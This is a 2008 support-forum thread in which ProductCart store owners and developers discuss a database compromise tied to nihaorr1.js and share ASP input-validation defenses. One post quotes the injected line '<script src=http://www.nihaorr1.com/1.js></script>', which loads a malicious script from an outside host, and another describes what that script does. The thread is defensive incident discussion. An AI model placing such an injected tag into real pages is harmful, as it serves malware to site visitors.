
Database Breach

kimmyecoist (Newbie)
Posted: 18-April-2008 at 11:53am
Our site has been down due to a database breach from an unknown .js code
and site. Nihaorr1.js

Is there any patch or solution for this security breach?

We're running version 3.03.

Does anyone else have affected databases?

Hamish (Admin Group)
Posted: 18-April-2008 at 12:00pm
Do you have any info on how the hack was achieved?
If you find/suspect it's an issue with PC then please raise a support request to EA at the earliest opportunity - I know they are keen to keep their product & users safe.

Best of luck with the recovery of your site.
I would recommend upgrading soon after to the latest release.

ProductCart (Admin Group, ProductCart Team)
Posted: 18-April-2008 at 12:10pm
Definitely open a support ticket so that we can learn more about this.

We have no reports of any security issues of any kind. As you know, ProductCart-powered stores pass HackerSafe tests, which is a good indication of an application that protects you from known security concerns such as SQL injections.

For more information: HackerSafe (now McAfee Secure)



Edited by earlyimp - 22-October-2008 at 6:33pm
The ProductCart Team

Home of ProductCart shopping cart software

Hamish (Admin Group)
Posted: 18-April-2008 at 12:15pm
I Googled it - looks like an SQL injection attack:

<snip>Our initial investigations are pointing at an attack through IIS using ASP in an overload. 

whois lookup showing nihaorr1 registered via Chinese registrar xinnet.com

I used the safety of a VM to look under the hood at the operations of the 1.js file.

It writes several iframes to that seem to come up as page not found (Chinese language pack)
A look at the script is a bit confusing and garbled (of course) but consistent reference is made to "cuteqq" as a variable and variable prefix. It creates an executable; I have yet to determine its intent or impact.
Googling "cuteqq" pulls up all sorts of harmful flagged pages.  Anyone have any insight on that?

</snip>


kimmyecoist (Newbie)
Posted: 18-April-2008 at 12:19pm
I'm opening a ticket currently.

The effect of the script on our site causes our images to not show up,
certain pages to not work, and we are unable to log into ProductCart admin.

We are working with the Host currently to restore to a backup of a clean DB.


Greg Dinger (Certified ProductCart Developers)
Posted: 18-April-2008 at 12:21pm

It used to be that "sql injection" was all the rage.  In recent months an attack method called "cross site scripting" has become ever so popular and is deadly.  The level of hack attempts has become intense and strong protective measures are necessary.

ProductCart has strong security measures but many sites have other software, such as FAQ tools, news tools, and the like built into them.  Any of those secondary applications may be vulnerable to security threats. 

As a general warning to the entire PC community:  If you have added other scripts to your site, you would be well-advised to engage the services of a professional programmer to review your site and examine such applications for security threats.  It's worth a couple hours of someone's time to poke around instead of running the risk that some day you have to confront the fact you have been hacked.

Here is an e-mail I received from a fellow-developer yesterday, which he had just received from a client.  Don't be the next site to get hacked.   Protect yourselves!

“This past weekend it would appear our database was compromised somehow and it pasted this script into every item we have and just totally deleted all the item descriptions. I have contacted the site host and they did a database restore and everything was fine. Now today I see that same script has been pasted to our “add to cart” button and not allowing customers to purchase items.

Here is the script: <script src=http://www.nihaorr1.com/1.js></script>”

BTW, I should note that the above customer does NOT use PC.  They use a different cart...



Edited by Greg Dinger - 18-April-2008 at 12:22pm
kimmyecoist (Newbie)
Posted: 18-April-2008 at 12:38pm
Greg, that is what has happened to us.

Can you please advise on what to do? Our programmers are looking for us
to see what patches ProductCart offers in order to update our code.

katharina (Senior Member)
Posted: 18-April-2008 at 12:38pm
Thank you all for the alert.  It does have a function when something like this gets posted into the forum.  I agree that a trouble ticket has to be raised, yet at the same time it is good to have some sort of warning.  This may not affect all of us and it may be only one incident and perhaps was caused by some other application running in conjunction with PC.  I want to be safe until we really know what has been going on.

I've taken the following actions as a precaution:
1. I did back up the store database.
2. I did purge all credit cards.
I will do both actions daily until we have this possible threat resolved.

Again thanks for the heads up,
Katharina

Greg Dinger (Certified ProductCart Developers)
Posted: 18-April-2008 at 12:50pm
Kimmy - Now that your site is back up, I do see that you have a dealer locator page on your site, and that it uses a database.  That may very well be the page that was vulnerable to cross site scripting.  Based on your reference to "Nihaorr1.js", which matches the customer report I posted, I do believe that you got nailed by an XSS attack.

Greg Dinger (Certified ProductCart Developers)
Posted: 18-April-2008 at 1:01pm

Kimmy - your question arrived while I was posting the other response. 

What has to happen is that you have to examine the values that are being passed from page to page.  Someone may have different ideas about how to address this, but here is an example of what I implement for pages that pass a numeric id for a category.  Essentially, if the required category is not provided, I set a fail code.  If the passed value is not a number, I set a fail code.  And when the fail code is set, then I gracefully display an "invalid entry" message and kill the page.  The threat ends there.  (If others have alternative approaches, PLEASE let us know.)

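<%
' Read the category id passed in the query string
catid = getUserInput(Request.QueryString("catid"),0)
badcat = "0"
' Fail when the required value is missing
if trim(catid) = "" then badcat = "1"
' Fail when the value is not numeric (IsNumeric returns a Boolean, so test it with Not)
if Not IsNumeric(trim(catid)) then badcat = "1"
if badcat = "1" then
' Show the error message, close the page and stop processing
%>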
<div class="bodytext">
<br /><br /><br />Sorry - insufficient data to process request<br /><br /><br />
</div>
<!--#include virtual="/gallery/includes/footer.asp"-->
<!--#include virtual="/includes/footer.asp"-->
</body>
</html>
<%
response.end
end if
%>

Now in your case, you are passing 2-digit alpha state codes.  If that is the only legitimate value, then you can use ASP string commands to trim that value to a 2-digit length.  By doing that, if the hacker placed additional characters into the querystring, they are chopped off and rendered harmless.

I have another mechanism that I use.  It is a script that is installed in the site, replaces the IIS 500-100 error, and sends the site owner or host (me) an e-mail when a page in the site crashes.  It tends to not be effective for the PC section of the site because EI has their own error handling.  But for other pages, I have found this an essential tool in my defensive measures.  I know every time a script chokes and can frequently tell that the reason for the page crashing was a hack attempt.

Again, if anyone has alternatives they consider stronger or more effective, please speak up.  The barrage of hack attempts these days seems endless and I take these threats very seriously.
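
The checks described in the post above, tightened into allow-list validation, as an added example that is not part of the original post or of ProductCart's code; the function names and the `state` parameter name are assumptions. It rejects a bad state code instead of truncating it, because a value cut to two characters can still contain a quote or another non-letter, and it accepts digits only because IsNumeric also returns True for forms such as "1e5" and "&H1F".

```vbscript
<%
' Added example. ParseCategoryId, ParseStateCode, MatchesPattern and the
' "state" query-string name are assumptions, not ProductCart functions.

Function MatchesPattern(ByVal value, ByVal pattern)
    Dim re
    Set re = New RegExp
    re.Pattern = pattern
    MatchesPattern = re.Test(value)
End Function

' Numeric id: 1 to 9 digits and nothing else, so CLng cannot overflow.
' Returns -1 when the value is missing or malformed.
Function ParseCategoryId(ByVal raw)
    Dim s
    s = Trim(raw & "")
    ParseCategoryId = -1
    If MatchesPattern(s, "^[0-9]{1,9}$") Then ParseCategoryId = CLng(s)
End Function

' State code: exactly two letters. Returns "" when the value is rejected;
' the input is never truncated to make it fit.
Function ParseStateCode(ByVal raw)
    Dim s
    s = UCase(Trim(raw & ""))
    ParseStateCode = ""
    If MatchesPattern(s, "^[A-Z]{2}$") Then ParseStateCode = s
End Function

Dim catid, stateCode
catid = ParseCategoryId(Request.QueryString("catid"))
stateCode = ParseStateCode(Request.QueryString("state"))

If catid < 0 Or stateCode = "" Then
    ' Stop before any query is built from the request values.
    Response.Status = "400 Bad Request"
    Response.Write "Sorry - insufficient data to process request"
    Response.End
End If
%>
```

Place the block at the top of the page, before any output is written and before the values reach a database query.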
